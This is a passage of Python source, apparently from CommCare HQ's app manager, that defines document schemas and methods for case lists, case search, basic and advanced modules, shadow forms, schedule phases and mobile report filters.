column.rename_lang(old_lang, new_lang)
def sort_nodeset_columns_for_detail(self):
return (
self.display == "long" and
self.sort_nodeset_columns and
any(tab for tab in self.get_tabs() if tab.has_nodeset)
)
class CaseList(IndexedSchema, NavMenuItemMediaMixin):
label = DictProperty()
show = BooleanProperty(default=False)
def rename_lang(self, old_lang, new_lang):
_rename_key(self.label, old_lang, new_lang)
def get_app(self):
return self._module.get_app()
class CaseSearchProperty(DocumentSchema):
"""
Case properties available to search on.
"""
name = StringProperty()
label = DictProperty()
class DefaultCaseSearchProperty(DocumentSchema):
"""Case Properties with fixed value to search on"""
property = StringProperty()
default_value = StringProperty()
class CaseSearch(DocumentSchema):
"""
Properties and search command label
"""
command_label = DictProperty(default={'en': 'Search All Cases'})
properties = SchemaListProperty(CaseSearchProperty)
relevant = StringProperty(default=CLAIM_DEFAULT_RELEVANT_CONDITION)
search_button_display_condition = StringProperty()
include_closed = BooleanProperty(default=False)
default_properties = SchemaListProperty(DefaultCaseSearchProperty)
blacklisted_owner_ids_expression = StringProperty()
class ParentSelect(DocumentSchema):
active = BooleanProperty(default=False)
relationship = StringProperty(default='parent')
module_id = StringProperty()
class FixtureSelect(DocumentSchema):
"""
Configuration for creating a details screen from a fixture which can be used to pre-filter
cases prior to displaying the case list.
fixture_type: FixtureDataType.tag
display_column: name of the column to display in the list
localize: boolean if display_column actually contains the key for the localized string
variable_column: name of the column whose value should be saved when the user selects an item
xpath: xpath expression to use as the case filter
"""
active = BooleanProperty(default=False)
fixture_type = StringProperty()
display_column = StringProperty()
localize = BooleanProperty(default=False)
variable_column = StringProperty()
xpath = StringProperty(default='')
class DetailPair(DocumentSchema):
short = SchemaProperty(Detail)
long = SchemaProperty(Detail)
@classmethod
def wrap(cls, data):
self = super(DetailPair, cls).wrap(data)
self.short.display = 'short'
self.long.display = 'long'
return self
class CaseListForm(NavMenuItemMediaMixin):
form_id = FormIdProperty('modules[*].case_list_form.form_id')
label = DictProperty()
post_form_workflow = StringProperty(
default=WORKFLOW_DEFAULT,
choices=REGISTRATION_FORM_WORFLOWS,
)
def rename_lang(self, old_lang, new_lang):
_rename_key(self.label, old_lang, new_lang)
def get_app(self):
return self._module.get_app()
class ModuleBase(IndexedSchema, ModuleMediaMixin, NavMenuItemMediaMixin, CommentMixin):
name = DictProperty(six.text_type)
unique_id = StringProperty()
case_type = StringProperty()
case_list_form = SchemaProperty(CaseListForm)
module_filter = StringProperty()
put_in_root = BooleanProperty(default=False)
root_module_id = StringProperty()
fixture_select = SchemaProperty(FixtureSelect)
auto_select_case = BooleanProperty(default=False)
is_training_module = BooleanProperty(default=False)
def __init__(self, *args, **kwargs):
super(ModuleBase, self).__init__(*args, **kwargs)
self.assign_references()
@property
def is_surveys(self):
return self.case_type == ""
def assign_references(self):
if hasattr(self, 'case_list'):
self.case_list._module = self
if hasattr(self, 'case_list_form'):
self.case_list_form._module = self
@classmethod
def wrap(cls, data):
if cls is ModuleBase:
doc_type = data['doc_type']
if doc_type == 'Module':
return Module.wrap(data)
elif doc_type == 'AdvancedModule':
return AdvancedModule.wrap(data)
elif doc_type == 'ReportModule':
return ReportModule.wrap(data)
elif doc_type == 'ShadowModule':
return ShadowModule.wrap(data)
else:
raise ValueError('Unexpected doc_type for Module', doc_type)
else:
return super(ModuleBase, cls).wrap(data)
def get_or_create_unique_id(self):
"""
It is the caller's responsibility to save the Application
after calling this function.
WARNING: If called on the same doc in different requests without saving,
this function will return a different uuid each time,
likely causing unexpected behavior
"""
if not self.unique_id:
self.unique_id = uuid.uuid4().hex
return self.unique_id
get_forms = IndexedSchema.Getter('forms')
def get_suite_forms(self):
return [f for f in self.get_forms() if not f.is_a_disabled_release_form()]
@parse_int([1])
def get_form(self, i):
try:
return self.forms[i].with_id(i % len(self.forms), self)
except IndexError:
raise FormNotFoundException()
def get_form_index(self, unique_id):
for index, form in enumerate(self.get_forms()):
if form.unique_id == unique_id:
return index
error = _("Could not find form with ID='{unique_id}' in module '{module_name}'.").format(
module_name=self.name, unique_id=unique_id)
raise FormNotFoundException(error)
def get_child_modules(self):
return [
module for module in self.get_app().get_modules()
if module.unique_id != self.unique_id and getattr(module, 'root_module_id', None) == self.unique_id
]
@property
def root_module(self):
if self.root_module_id:
return self._parent.get_module_by_unique_id(self.root_module_id,
error=_("Could not find parent menu for '{}'").format(self.default_name()))
def requires_case_details(self):
return False
def root_requires_same_case(self):
return self.root_module \
and self.root_module.case_type == self.case_type \
and self.root_module.all_forms_require_a_case()
def get_case_types(self):
return set([self.case_type])
def get_app(self):
return self._parent
def default_name(self, app=None):
if not app:
app = self.get_app()
return trans(
self.name,
[app.default_language] + app.langs,
include_lang=False
)
def rename_lang(self, old_lang, new_lang):
_rename_key(self.name, old_lang, new_lang)
for form in self.get_forms():
form.rename_lang(old_lang, new_lang)
for _, detail, _ in self.get_details():
detail.rename_lang(old_lang, new_lang)
def get_form_by_unique_id(self, unique_id):
for form in self.get_forms():
if form.get_unique_id() == unique_id:
return form
@property
def validator(self):
return ModuleBaseValidator(self)
def validate_for_build(self):
return self.validator.validate_for_build()
@memoized
def get_subcase_types(self):
'''
Return a set of each case type for which this module has a form that
opens a new subcase of that type.
'''
subcase_types = set()
for form in self.get_forms():
if hasattr(form, 'get_subcase_types'):
subcase_types.update(form.get_subcase_types())
return subcase_types
def get_custom_entries(self):
"""
By default, suite entries are configured by forms, but you can also provide custom
entries by overriding this function.
See ReportModule for an example
"""
return []
def uses_media(self):
"""
Whether the module uses media. If this returns false then media will not be generated
for the module.
"""
return True
def uses_usercase(self):
return False
def add_insert_form(self, from_module, form, index=None, with_source=False):
raise IncompatibleFormTypeException()
def update_app_case_meta(self, app_case_meta):
pass
class ModuleDetailsMixin(object):
@classmethod
def wrap_details(cls, data):
if 'details' in data:
try:
case_short, case_long, ref_short, ref_long = data['details']
except ValueError:
# "need more than 0 values to unpack"
pass
else:
data['case_details'] = {
'short': case_short,
'long': case_long,
}
data['ref_details'] = {
'short': ref_short,
'long': ref_long,
}
finally:
del data['details']
return data
@property
def case_list_filter(self):
try:
return self.case_details.short.filter
except AttributeError:
return None
@property
def detail_sort_elements(self):
try:
return self.case_details.short.sort_elements
except Exception:
return []
@property
def search_detail(self):
return deepcopy(self.case_details.short)
def rename_lang(self, old_lang, new_lang):
super(Module, self).rename_lang(old_lang, new_lang)
for case_list in (self.case_list, self.referral_list):
case_list.rename_lang(old_lang, new_lang)
def export_json(self, dump_json=True, keep_unique_id=False):
source = self.to_json()
if not keep_unique_id:
for form in source['forms']:
del form['unique_id']
return json.dumps(source) if dump_json else source
def get_details(self):
details = [
('case_short', self.case_details.short, True),
('case_long', self.case_details.long, True),
('ref_short', self.ref_details.short, False),
('ref_long', self.ref_details.long, False),
]
if module_offers_search(self) and not self.case_details.short.custom_xml:
details.append(('search_short', self.search_detail, True))
return tuple(details)
class Module(ModuleBase, ModuleDetailsMixin):
"""
A group of related forms, and configuration that applies to them all.
Translates to a top-level menu on the phone.
"""
module_type = 'basic'
forms = SchemaListProperty(Form)
case_details = SchemaProperty(DetailPair)
ref_details = SchemaProperty(DetailPair)
case_list = SchemaProperty(CaseList)
referral_list = SchemaProperty(CaseList)
task_list = SchemaProperty(CaseList)
parent_select = SchemaProperty(ParentSelect)
search_config = SchemaProperty(CaseSearch)
display_style = StringProperty(default='list')
@classmethod
def wrap(cls, data):
data = cls.wrap_details(data)
return super(Module, cls).wrap(data)
@classmethod
def new_module(cls, name, lang):
detail = Detail(
columns=[DetailColumn(
format='plain',
header={(lang or 'en'): ugettext("Name")},
field='name',
model='case',
hasAutocomplete=True,
)]
)
module = cls(
name={(lang or 'en'): name or ugettext("Untitled Module")},
forms=[],
case_type='',
case_details=DetailPair(
short=Detail(detail.to_json()),
long=Detail(detail.to_json()),
),
)
module.get_or_create_unique_id()
return module
@classmethod
def new_training_module(cls, name, lang):
module = cls.new_module(name, lang)
module.is_training_module = True
return module
def new_form(self, name, lang, attachment=Ellipsis):
from corehq.apps.app_manager.views.utils import get_blank_form_xml
lang = lang if lang else "en"
name = name if name else _("Untitled Form")
form = Form(
name={lang: name},
)
self.forms.append(form)
form = self.get_form(-1)
if attachment == Ellipsis:
attachment = get_blank_form_xml(name)
form.source = attachment
return form
def add_insert_form(self, from_module, form, index=None, with_source=False):
if isinstance(form, Form):
new_form = form
elif isinstance(form, AdvancedForm) and not len(list(form.actions.get_all_actions())):
new_form = Form(
name=form.name,
form_filter=form.form_filter,
media_image=form.media_image,
media_audio=form.media_audio
)
new_form._parent = self
form._parent = self
if with_source:
new_form.source = form.source
else:
raise IncompatibleFormTypeException(_('''
Cannot move an advanced form with actions into a basic menu.
'''))
if index is not None:
self.forms.insert(index, new_form)
else:
self.forms.append(new_form)
return self.get_form(index or -1)
@property
def validator(self):
return ModuleValidator(self)
def requires(self):
r = set(["none"])
for form in self.get_forms():
r.add(form.requires)
if self.case_list.show:
r.add('case')
if self.referral_list.show:
r.add('referral')
for val in ("referral", "case", "none"):
if val in r:
return val
def requires_case_details(self):
ret = False
if self.case_list.show:
return True
for form in self.get_forms():
if form.requires_case():
ret = True
break
return ret
@memoized
def all_forms_require_a_case(self):
return all([form.requires == 'case' for form in self.get_forms()])
def uses_usercase(self):
"""Return True if this module has any forms that use the usercase.
"""
return any(form.uses_usercase() for form in self.get_forms())
def grid_display_style(self):
return self.display_style == 'grid'
def update_app_case_meta(self, meta):
from corehq.apps.reports.formdetails.readable import CaseMetaException
for column in self.case_details.long.columns:
try:
meta.add_property_detail('long', self.case_type, self.unique_id, column)
except CaseMetaException:
pass
for column in self.case_details.short.columns:
try:
meta.add_property_detail('short', self.case_type, self.unique_id, column)
except CaseMetaException:
pass
class AdvancedForm(IndexedFormBase, FormMediaMixin, NavMenuItemMediaMixin):
form_type = 'advanced_form'
form_filter = StringProperty()
actions = SchemaProperty(AdvancedFormActions)
schedule = SchemaProperty(FormSchedule, default=None)
@classmethod
def wrap(cls, data):
# lazy migration to swap keys with values in action preload dict.
# http://manage.dimagi.com/default.asp?162213
load_actions = data.get('actions', {}).get('load_update_cases', [])
for action in load_actions:
preload = action['preload']
if preload and list(preload.values())[0].startswith('/'):
action['preload'] = {v: k for k, v in preload.items()}
return super(AdvancedForm, cls).wrap(data)
def pre_delete_hook(self):
try:
self.disable_schedule()
except (ScheduleError, TypeError, AttributeError) as e:
logging.error("There was a {error} while running the pre_delete_hook on {form_id}. "
"There is probably nothing to worry about, but you could check to make sure "
"that there are no issues with this form.".format(error=e, form_id=self.unique_id))
pass
def get_action_type(self):
actions = self.actions.actions_meta_by_tag
by_type = defaultdict(list)
action_type = []
for action_tag, action_meta in six.iteritems(actions):
by_type[action_meta.get('type')].append(action_tag)
for type, tag_list in six.iteritems(by_type):
action_type.append('{} ({})'.format(type, ', '.join(filter(None, tag_list))))
return ' '.join(action_type)
def pre_move_hook(self, from_module, to_module):
if from_module != to_module:
try:
self.disable_schedule()
except (ScheduleError, TypeError, AttributeError) as e:
logging.error("There was a {error} while running the pre_move_hook on {form_id}. "
"There is probably nothing to worry about, but you could check to make sure "
"that there are no issues with this module.".format(error=e, form_id=self.unique_id))
pass
def add_stuff_to_xform(self, xform, build_profile_id=None):
super(AdvancedForm, self).add_stuff_to_xform(xform, build_profile_id)
xform.add_case_and_meta_advanced(self)
def requires_case(self):
"""Form requires a case that must be selected by the user (excludes autoloaded cases)
"""
return any(not action.auto_select for action in self.actions.load_update_cases)
@property
def requires(self):
return 'case' if self.requires_case() else 'none'
@property
def validator(self):
return AdvancedFormValidator(self)
def is_registration_form(self, case_type=None):
"""
Defined as form that opens a single case. If the case is a sub-case then
the form is only allowed to load parent cases (and any auto-selected cases).
"""
reg_actions = self.get_registration_actions(case_type)
if len(reg_actions) != 1:
return False
load_actions = [action for action in self.actions.load_update_cases if not action.auto_select]
if not load_actions:
return True
reg_action = reg_actions[0]
if not reg_action.case_indices:
return False
actions_by_tag = deepcopy(self.actions.actions_meta_by_tag)
actions_by_tag.pop(reg_action.case_tag)
def check_parents(tag):
"""Recursively check parent actions to ensure that all actions for this form are
either parents of the registration action or else auto-select actions.
"""
if not tag:
return not actions_by_tag or all(
getattr(a['action'], 'auto_select', False) for a in actions_by_tag.values()
)
try:
parent = actions_by_tag.pop(tag)
except KeyError:
return False
return all(check_parents(p.tag) for p in parent['action'].case_indices)
return all(check_parents(parent.tag) for parent in reg_action.case_indices)
def get_registration_actions(self, case_type=None):
"""
:return: List of actions that create a case. Subcase actions are included
as long as they are not inside a repeat. If case_type is not None
only return actions that create a case of the specified type.
"""
registration_actions = [
action for action in self.actions.get_open_actions()
if not action.is_subcase or not action.repeat_context
]
if case_type:
registration_actions = [a for a in registration_actions if a.case_type == case_type]
return registration_actions
def uses_case_type(self, case_type, invert_match=False):
def match(ct):
matches = ct == case_type
return not matches if invert_match else matches
return any(action for action in self.actions.load_update_cases if match(action.case_type))
def uses_usercase(self):
return self.uses_case_type(USERCASE_TYPE)
def all_other_forms_require_a_case(self):
m = self.get_module()
return all([form.requires == 'case' for form in m.get_forms() if form.id != self.id])
def get_module(self):
return self._parent
def get_phase(self):
module = self.get_module()
return next((phase for phase in module.get_schedule_phases()
for form in phase.get_forms()
if form.unique_id == self.unique_id),
None)
def disable_schedule(self):
if self.schedule:
self.schedule.enabled = False
phase = self.get_phase()
if phase:
phase.remove_form(self)
def get_case_updates(self):
updates_by_case_type = defaultdict(set)
format_key = self.get_case_property_name_formatter()
for action in self.actions.get_all_actions():
case_type = action.case_type
updates_by_case_type[case_type].update(
format_key(*item) for item in six.iteritems(action.case_properties))
if self.schedule and self.schedule.enabled and self.source:
xform = self.wrapped_xform()
self.add_stuff_to_xform(xform)
scheduler_updates = xform.get_scheduler_case_updates()
else:
scheduler_updates = {}
for case_type, updates in scheduler_updates.items():
updates_by_case_type[case_type].update(updates)
return updates_by_case_type
@memoized
def get_all_contributed_subcase_properties(self):
case_properties = defaultdict(set)
for subcase in self.actions.get_subcase_actions():
case_properties[subcase.case_type].update(list(subcase.case_properties.keys()))
return case_properties
@memoized
def get_contributed_case_relationships(self):
case_relationships_by_child_type = defaultdict(set)
for subcase in self.actions.get_subcase_actions():
child_case_type = subcase.case_type
for case_index in subcase.case_indices:
parent = self.actions.get_action_from_tag(case_index.tag)
if parent:
case_relationships_by_child_type[child_case_type].add(
(parent.case_type, case_index.reference_id or 'parent'))
return case_relationships_by_child_type
def update_app_case_meta(self, app_case_meta):
from corehq.apps.reports.formdetails.readable import FormQuestionResponse
questions = {
q['value']: FormQuestionResponse(q)
for q in self.get_questions(self.get_app().langs, include_translations=True)
}
self._add_save_to_case_questions(questions, app_case_meta)
for action in self.actions.load_update_cases:
for name, question_path in action.case_properties.items():
self.add_property_save(
app_case_meta,
action.case_type,
name,
questions,
question_path
)
for question_path, name in action.preload.items():
self.add_property_load(
app_case_meta,
action.case_type,
name,
questions,
question_path
)
if action.close_condition.is_active():
meta = app_case_meta.get_type(action.case_type)
meta.add_closer(self.unique_id, action.close_condition)
for action in self.actions.open_cases:
self.add_property_save(
app_case_meta,
action.case_type,
'name',
questions,
action.name_path,
action.open_condition
)
for name, question_path in action.case_properties.items():
self.add_property_save(
app_case_meta,
action.case_type,
name,
questions,
question_path,
action.open_condition
)
meta = app_case_meta.get_type(action.case_type)
meta.add_opener(self.unique_id, action.open_condition)
if action.close_condition.is_active():
meta.add_closer(self.unique_id, action.close_condition)
class ShadowForm(AdvancedForm):
form_type = 'shadow_form'
# The unqiue id of the form we are shadowing
shadow_parent_form_id = FormIdProperty("modules[*].forms[*].shadow_parent_form_id")
# form actions to be merged with the parent actions
extra_actions = SchemaProperty(AdvancedFormActions)
def __init__(self, *args, **kwargs):
super(ShadowForm, self).__init__(*args, **kwargs)
self._shadow_parent_form = None
@property
def shadow_parent_form(self):
if not self.shadow_parent_form_id:
return None
else:
if not self._shadow_parent_form or self._shadow_parent_form.unique_id != self.shadow_parent_form_id:
app = self.get_app()
try:
self._shadow_parent_form = app.get_form(self.shadow_parent_form_id)
except FormNotFoundException:
self._shadow_parent_form = None
return self._shadow_parent_form
@property
def source(self):
if self.shadow_parent_form:
return self.shadow_parent_form.source
from corehq.apps.app_manager.views.utils import get_blank_form_xml
return get_blank_form_xml("")
def get_validation_cache(self):
if not self.shadow_parent_form:
return None
return self.shadow_parent_form.validation_cache
def set_validation_cache(self, cache):
if self.shadow_parent_form:
self.shadow_parent_form.validation_cache = cache
@property
def xmlns(self):
if not self.shadow_parent_form:
return None
else:
return self.shadow_parent_form.xmlns
@property
def actions(self):
if not self.shadow_parent_form:
shadow_parent_actions = AdvancedFormActions()
else:
shadow_parent_actions = self.shadow_parent_form.actions
return self._merge_actions(shadow_parent_actions, self.extra_actions)
@property
def validator(self):
return ShadowFormValidator(self)
def get_shadow_parent_options(self):
options = [
(form.get_unique_id(), '{} / {}'.format(form.get_module().default_name(), form.default_name()))
for form in self.get_app().get_forms() if form.form_type == "advanced_form"
]
if self.shadow_parent_form_id and self.shadow_parent_form_id not in [x[0] for x in options]:
options = [(self.shadow_parent_form_id, ugettext_lazy("Unknown, please change"))] + options
return options
@staticmethod
def _merge_actions(source_actions, extra_actions):
new_actions = []
source_action_map = {
action.case_tag: action
for action in source_actions.load_update_cases
}
overwrite_properties = [
"case_type",
"details_module",
"auto_select",
"load_case_from_fixture",
"show_product_stock",
"product_program",
"case_index",
]
for action in extra_actions.load_update_cases:
if action.case_tag in source_action_map:
new_action = LoadUpdateAction.wrap(source_action_map[action.case_tag].to_json())
else:
new_action = LoadUpdateAction(case_tag=action.case_tag)
for prop in overwrite_properties:
setattr(new_action, prop, getattr(action, prop))
new_actions.append(new_action)
return AdvancedFormActions(
load_update_cases=new_actions,
open_cases=source_actions.open_cases, # Shadow form is not allowed to specify any open case actions
)
class SchedulePhaseForm(IndexedSchema):
"""
A reference to a form in a schedule phase.
"""
form_id = FormIdProperty("modules[*].schedule_phases[*].forms[*].form_id")
class SchedulePhase(IndexedSchema):
"""
SchedulePhases are attached to a module.
A Schedule Phase is a grouping of forms that occur within a period and share an anchor
A module should not have more than one SchedulePhase with the same anchor
anchor: Case property containing a date after which this phase becomes active
forms: The forms that are to be filled out within this phase
"""
anchor = StringProperty()
forms = SchemaListProperty(SchedulePhaseForm)
@property
def id(self):
""" A Schedule Phase is 1-indexed """
_id = super(SchedulePhase, self).id
return _id + 1
@property
def phase_id(self):
return "{}_{}".format(self.anchor, self.id)
def get_module(self):
return self._parent
_get_forms = IndexedSchema.Getter('forms')
def get_forms(self):
"""Returns the actual form objects related to this phase"""
module = self.get_module()
return (module.get_form_by_unique_id(form.form_id) for form in self._get_forms())
def get_form(self, desired_form):
return next((form for form in self.get_forms() if form.unique_id == desired_form.unique_id), None)
def get_phase_form_index(self, form):
"""
Returns the index of the form with respect to the phase
schedule_phase.forms = [a,b,c]
schedule_phase.get_phase_form_index(b)
=> 1
schedule_phase.get_phase_form_index(c)
=> 2
"""
return next((phase_form.id for phase_form in self._get_forms() if phase_form.form_id == form.unique_id),
None)
def remove_form(self, form):
"""Remove a form from the phase"""
idx = self.get_phase_form_index(form)
if idx is None:
raise ScheduleError("That form doesn't exist in the phase")
self.forms.remove(self.forms[idx])
def add_form(self, form):
"""Adds a form to this phase, removing it from other phases"""
old_phase = form.get_phase()
if old_phase is not None and old_phase.anchor != self.anchor:
old_phase.remove_form(form)
if self.get_form(form) is None:
self.forms.append(SchedulePhaseForm(form_id=form.unique_id))
def change_anchor(self, new_anchor):
if new_anchor is None or new_anchor.strip() == '':
raise ScheduleError(_("You can't create a phase without an anchor property"))
self.anchor = new_anchor
if self.get_module().phase_anchors.count(new_anchor) > 1:
raise ScheduleError(_("You can't have more than one phase with the anchor {}").format(new_anchor))
class AdvancedModule(ModuleBase):
module_type = 'advanced'
forms = SchemaListProperty(FormBase)
case_details = SchemaProperty(DetailPair)
product_details = SchemaProperty(DetailPair)
case_list = SchemaProperty(CaseList)
has_schedule = BooleanProperty()
schedule_phases = SchemaListProperty(SchedulePhase)
get_schedule_phases = IndexedSchema.Getter('schedule_phases')
search_config = SchemaProperty(CaseSearch)
@property
def is_surveys(self):
return False
@classmethod
def wrap(cls, data):
# lazy migration to accommodate search_config as empty list
# http://manage.dimagi.com/default.asp?231186
if data.get('search_config') == []:
data['search_config'] = {}
return super(AdvancedModule, cls).wrap(data)
@classmethod
def new_module(cls, name, lang):
detail = Detail(
columns=[DetailColumn(
format='plain',
header={(lang or 'en'): ugettext("Name")},
field='name',
model='case',
)]
)
module = AdvancedModule(
name={(lang or 'en'): name or ugettext("Untitled Module")},
forms=[],
case_type='',
case_details=DetailPair(
short=Detail(detail.to_json()),
long=Detail(detail.to_json()),
),
product_details=DetailPair(
short=Detail(
columns=[
DetailColumn(
format='plain',
header={(lang or 'en'): ugettext("Product")},
field='name',
model='product',
),
],
),
long=Detail(),
),
)
module.get_or_create_unique_id()
return module
def new_form(self, name, lang, attachment=Ellipsis):
from corehq.apps.app_manager.views.utils import get_blank_form_xml
lang = lang if lang else "en"
name = name if name else _("Untitled Form")
form = AdvancedForm(
name={lang: name},
)
form.schedule = FormSchedule(enabled=False)
self.forms.append(form)
form = self.get_form(-1)
if attachment == Ellipsis:
attachment = get_blank_form_xml(name)
form.source = attachment
return form
def new_shadow_form(self, name, lang):
lang = lang if lang else "en"
name = name if name else _("Untitled Form")
form = ShadowForm(
name={lang: name},
no_vellum=True,
)
form.schedule = FormSchedule(enabled=False)
self.forms.append(form)
form = self.get_form(-1)
form.get_unique_id() # This function sets the unique_id. Normally setting the source sets the id.
return form
def add_insert_form(self, from_module, form, index=None, with_source=False):
if isinstance(form, AdvancedForm):
new_form = form
elif isinstance(form, Form):
new_form = AdvancedForm(
name=form.name,
form_filter=form.form_filter,
media_image=form.media_image,
media_audio=form.media_audio,
comment=form.comment,
)
new_form._parent = self
form._parent = self
if with_source:
new_form.source = form.source
actions = form.active_actions()
open = actions.get('open_case', None)
update = actions.get('update_case', None)
close = actions.get('close_case', None)
preload = actions.get('case_preload', None)
subcases = actions.get('subcases', None)
case_type = from_module.case_type
base_action = None
if open:
base_action = AdvancedOpenCaseAction(
case_type=case_type,
case_tag='open_{0}_0'.format(case_type),
name_path=open.name_path,
open_condition=open.condition,
case_properties=update.update if update else {},
)
new_form.actions.open_cases.append(base_action)
elif update or preload or close:
base_action = LoadUpdateAction(
case_type=case_type,
case_tag='load_{0}_0'.format(case_type),
case_properties=update.update if update else {},
preload=preload.preload if preload else {}
)
if from_module.parent_select.active:
from_app = from_module.get_app() # A form can be copied from a module in a different app.
select_chain = get_select_chain(from_app, from_module, include_self=False)
for n, link in enumerate(reversed(list(enumerate(select_chain)))):
i, module = link
new_form.actions.load_update_cases.append(LoadUpdateAction(
case_type=module.case_type,
case_tag='_'.join(['parent'] * (i + 1)),
details_module=module.unique_id,
case_index=CaseIndex(tag='_'.join(['parent'] * (i + 2)) if n > 0 else '')
))
base_action.case_indices = [CaseIndex(tag='parent')]
if close:
base_action.close_condition = close.condition
new_form.actions.load_update_cases.append(base_action)
if subcases:
for i, subcase in enumerate(subcases):
open_subcase_action = AdvancedOpenCaseAction(
case_type=subcase.case_type,
case_tag='open_{0}_{1}'.format(subcase.case_type, i+1),
name_path=subcase.case_name,
open_condition=subcase.condition,
case_properties=subcase.case_properties,
repeat_context=subcase.repeat_context,
case_indices=[CaseIndex(
tag=base_action.case_tag if base_action else '',
reference_id=subcase.reference_id,
)]
)
new_form.actions.open_cases.append(open_subcase_action)
else:
raise IncompatibleFormTypeException()
if index is not None:
self.forms.insert(index, new_form)
else:
self.forms.append(new_form)
return self.get_form(index or -1)
def rename_lang(self, old_lang, new_lang):
super(AdvancedModule, self).rename_lang(old_lang, new_lang)
self.case_list.rename_lang(old_lang, new_lang)
def requires_case_details(self):
if self.case_list.show:
return True
for form in self.forms:
if any(action.case_type == self.case_type for action in form.actions.load_update_cases):
return True
def all_forms_require_a_case(self):
return all(form.requires_case() for form in self.forms)
@property
def search_detail(self):
return deepcopy(self.case_details.short)
def get_details(self):
details = [
('case_short', self.case_details.short, True),
('case_long', self.case_details.long, True),
('product_short', self.product_details.short, self.get_app().commtrack_enabled),
('product_long', self.product_details.long, False),
]
if module_offers_search(self) and not self.case_details.short.custom_xml:
details.append(('search_short', self.search_detail, True))
return details
@property
def validator(self):
return AdvancedModuleValidator(self)
def _uses_case_type(self, case_type, invert_match=False):
return any(form.uses_case_type(case_type, invert_match) for form in self.forms)
def uses_usercase(self):
"""Return True if this module has any forms that use the usercase.
"""
return self._uses_case_type(USERCASE_TYPE)
@property
def phase_anchors(self):
return [phase.anchor for phase in self.schedule_phases]
def get_or_create_schedule_phase(self, anchor):
"""Returns a tuple of (phase, new?)"""
if anchor is None or anchor.strip() == '':
raise ScheduleError(_("You can't create a phase without an anchor property"))
phase = next((phase for phase in self.get_schedule_phases() if phase.anchor == anchor), None)
is_new_phase = False
if phase is None:
self.schedule_phases.append(SchedulePhase(anchor=anchor))
# TODO: is there a better way of doing this?
phase = list(self.get_schedule_phases())[-1] # get the phase from the module so we know the _parent
is_new_phase = True
return (phase, is_new_phase)
def _clear_schedule_phases(self):
self.schedule_phases = []
def update_schedule_phases(self, anchors):
""" Take a list of anchors, reorders, deletes and creates phases from it """
old_phases = {phase.anchor: phase for phase in self.get_schedule_phases()}
self._clear_schedule_phases()
for anchor in anchors:
try:
self.schedule_phases.append(old_phases.pop(anchor))
except KeyError:
self.get_or_create_schedule_phase(anchor)
deleted_phases_with_forms = [anchor for anchor, phase in six.iteritems(old_phases) if len(phase.forms)]
if deleted_phases_with_forms:
raise ScheduleError(_("You can't delete phases with anchors "
"{phase_anchors} because they have forms attached to them").format(
phase_anchors=(", ").join(deleted_phases_with_forms)))
return self.get_schedule_phases()
def update_schedule_phase_anchors(self, new_anchors):
""" takes a list of tuples (id, new_anchor) and updates the phase anchors """
for anchor in new_anchors:
id = anchor[0] - 1
new_anchor = anchor[1]
try:
list(self.get_schedule_phases())[id].change_anchor(new_anchor)
except IndexError:
pass # That phase wasn't found, so we can't change it's anchor. Ignore it
def update_app_case_meta(self, meta):
for column in self.case_details.long.columns:
meta.add_property_detail('long', self.case_type, self.unique_id, column)
for column in self.case_details.short.columns:
meta.add_property_detail('short', self.case_type, self.unique_id, column)
class ReportAppFilter(DocumentSchema):
@classmethod
def wrap(cls, data):
if cls is ReportAppFilter:
return get_report_filter_class_for_doc_type(data['doc_type']).wrap(data)
else:
return super(ReportAppFilter, cls).wrap(data)
def get_filter_value(self, user, ui_filter):
raise NotImplementedError
MobileFilterConfig = namedtuple('MobileFilterConfig', ['doc_type', 'filter_class', 'short_description'])
def get_all_mobile_filter_configs():
return [
MobileFilterConfig('AutoFilter', AutoFilter, _('Value equal to a standard user property')),
MobileFilterConfig('CustomDataAutoFilter', CustomDataAutoFilter,
_('Value equal to a custom user property')),
MobileFilterConfig('StaticChoiceFilter', StaticChoiceFilter, _('An exact match of a constant value')),
MobileFilterConfig('StaticChoiceListFilter', StaticChoiceListFilter,
_('An exact match of a dynamic property')),
MobileFilterConfig('StaticDatespanFilter', StaticDatespanFilter, _('A standard date range')),
MobileFilterConfig('CustomDatespanFilter', CustomDatespanFilter, _('A custom range relative to today')),
MobileFilterConfig('CustomMonthFilter', CustomMonthFilter,
_("Custom Month Filter (you probably don't want this")),
MobileFilterConfig('MobileSelectFilter', MobileSelectFilter, _('Show choices on mobile device')),
MobileFilterConfig('AncestorLocationTypeFilter', AncestorLocationTypeFilter,
_("Ancestor location of the user's assigned location of a particular type")),
MobileFilterConfig('NumericFilter', NumericFilter, _('A numeric expression')),
]
def get_report_filter_class_for_doc_type(doc_type):
matched_configs = [config for config in get_all_mobile_filter_configs() if config.doc_type == doc_type]
if not matched_configs:
raise ValueError('Unexpected doc_type for ReportAppFilter', doc_type)
else:
assert len(matched_configs) == 1
return matched_configs[0].filter_class
def _filter_by_case_sharing_group_id(user, ui_filter):
from corehq.apps.reports_core.filters import Choice
return [
Choice(value=group._id, display=None)
for group in user.get_case_sharing_groups()
]
def _filter_by_location_id(user, ui_filter):
return ui_filter.value(**{ui_filter.name: user.location_id,
'request_user': user})
def _filter_by_location_ids(user, ui_filter):
from corehq.apps.userreports.reports.filters.values import CHOICE_DELIMITER
return ui_filter.value(**{ui_filter.name: CHOICE_DELIMITER.join(user.assigned_location_ids),
'request_user': user})
def _filter_by_username(user, ui_filter):
from corehq.apps.reports_core.filters import Choice
return Choice(value=user.raw_username, display=None)
def _filter_by_user_id(user, ui_filter):
from corehq.apps.reports_core.filters import Choice
return Choice(value=user._id, display=None)
def _filter_by_parent_location_id(user, ui_filter):
location = user.sql_location
location_parent = location.parent.location_id if location and location.parent else None
return ui_filter.value(**{ui_filter.name: location_parent,
'request_user': user})
AutoFilterConfig = namedtuple('AutoFilterConfig', ['slug', 'filter_function', 'short_description'])
def get_auto_filter_configurations():
return [
AutoFilterConfig('case_sharing_group', _filter_by_case_sharing_group_id,
_("The user's case sharing group")),
AutoFilterConfig('location_id', _filter_by_location_id, _("The user's assigned location")),
AutoFilterConfig('location_ids', _filter_by_location_ids, _("All of the user's assigned locations")),
AutoFilterConfig('parent_location_id', _filter_by_parent_location_id,
_("The parent location of the user's assigned location")),
AutoFilterConfig('username', _filter_by_username, _("The user's username")),
AutoFilterConfig('user_id', _filter_by_user_id, _("The user's ID")),
]
def _get_auto_filter_function(slug):
matched_configs = [config for config in get_auto_filter_configurations() if config.slug == slug]
if not matched_configs:
raise ValueError('Unexpected ID for AutoFilter', slug)
else:
assert len(matched_configs) == 1
return matched_configs[0].filter_function
class AutoFilter(ReportAppFilter):
filter_type = StringProperty(choices=[f.slug for f in get_auto_filter_configurations()])
def get_filter_value(self, user, ui_filter):
